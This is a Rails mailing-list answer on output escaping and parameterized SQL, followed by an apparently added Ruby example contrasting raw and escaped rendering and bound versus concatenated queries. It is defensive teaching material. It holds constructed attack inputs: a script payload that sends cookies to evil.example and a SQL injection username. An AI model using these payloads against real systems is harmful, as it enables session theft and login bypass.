On 5/28/05, Chris Frey <cdfrey-Da48MpWaEp0CzWx7n4ubxQ@public.gmane.org>
wrote:
> Hi,
>
> Please CC me since I'm not on the list yet.
>
> I have two questions regarding Rails:
>
> 1) How does Rails guarantee that user data is properly escaped in data
> sent to the browser, via view?
There are two constructs:

<%= @blah.something %>

will just output the raw value of @blah.something into the page, so
use this carefully.

<%=h @blah.something %>

will escape all the dangerous markup characters.
> Also, how does Rails guarantee it is
> properly escaped in data send to the SQL server via embedded SQL queries?
If you use the proper syntax, the adapters take care of it for you:

Blah.find(:all, :conditions => ["username = ? and password = ?",
                                username, password])

That will get escaped for you in the manner that's required for your
database. However, if you manually do 'php style' code like this:

Blah.find(:all, :conditions => "username = '" + username +
                               "' and password = '" + password + "'")

then you're on your own.
> 2) Is it possible to compile Ruby? I notice there is a compiler project
> with a quick google search, but does anyone use it here?
>
> I'd rather have a compiler find all syntax errors than having to find them
> with testing.
I'd rather test my code to catch all the other bugs rather than
pretend that just because it compiles it works. Syntax is the easy
part, any fool can do it. To build an application you've got to
write code that actually *does* the right thing. Compilers aren't
going to help you there at all.
--
Cheers
Koz
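The two points in the reply above (escape on the way out to the browser, bind rather than concatenate on the way in to SQL), as an added, stand-alone example that is not part of the original thread and not Rails code. The view half uses plain ERB with ERB::Util mixed in, which is where Rails' `h` helper comes from, so `<%= %>` versus `<%=h %>` behaves as the reply describes. The SQL half is a simplified stand-in for what the adapter does with `:conditions => [..., ?]`: it is not ActiveRecord's quoting code, only the SQL-standard rule of doubling embedded single quotes, so the difference between the bound and the concatenated string is visible without a database. `ViewContext`, `bind_conditions`, `safe_conditions` and `unsafe_conditions` are names chosen for this example, and the attacker inputs are constructed.

```ruby
require 'erb'

# --- View side: <%= value %> versus <%=h value %> ---------------------------
# Rails' `h` is ERB::Util.html_escape; including ERB::Util here gives plain
# ERB the same helper, so the two templates below mirror the ones in the reply.
class ViewContext
  include ERB::Util        # provides h(string)

  def initialize(value)
    @value = value
  end

  def render(template)
    ERB.new(template).result(binding)
  end
end

# Constructed attacker-controlled input: closes the cell and injects a script.
XSS_INPUT = %q{</td><script>document.location='http://evil.example/?c='+document.cookie</script>}

def render_raw(value)
  ViewContext.new(value).render("<td><%= @value %></td>")
end

def render_escaped(value)
  ViewContext.new(value).render("<td><%=h @value %></td>")
end

# --- SQL side: bound placeholders versus string concatenation ----------------
# Stand-in for adapter quoting (assumption, not the real adapter code): wrap in
# single quotes and double any embedded single quote, per the SQL standard.
def quote_sql_string(value)
  "'" + value.to_s.gsub("'", "''") + "'"
end

# Substitute each ? in the template with one quoted value, refusing a
# mismatch between placeholders and supplied values.
def bind_conditions(template, *values)
  placeholders = template.count("?")
  unless placeholders == values.size
    raise ArgumentError, "expected #{placeholders} values, got #{values.size}"
  end
  remaining = values.dup
  template.gsub("?") { quote_sql_string(remaining.shift) }
end

# The safe style from the reply: the adapter (here, bind_conditions) quotes.
def safe_conditions(username, password)
  bind_conditions("username = ? and password = ?", username, password)
end

# The "php style" concatenation from the reply: the input is spliced in raw.
def unsafe_conditions(username, password)
  "username = '" + username + "' and password = '" + password + "'"
end

# Constructed attacker username: closes the literal and comments out the rest,
# so the password check never runs in the concatenated version.
SQLI_USER = "admin' --"

if __FILE__ == $0
  puts render_raw(XSS_INPUT)
  puts render_escaped(XSS_INPUT)
  puts unsafe_conditions(SQLI_USER, "x")
  puts safe_conditions(SQLI_USER, "x")
end
```

In the escaped rendering the injected `<script>` arrives as `&lt;script&gt;` and is inert; in the bound SQL the attacker's quote is doubled inside the literal, so `admin' --` stays a username value instead of ending the string and starting a comment.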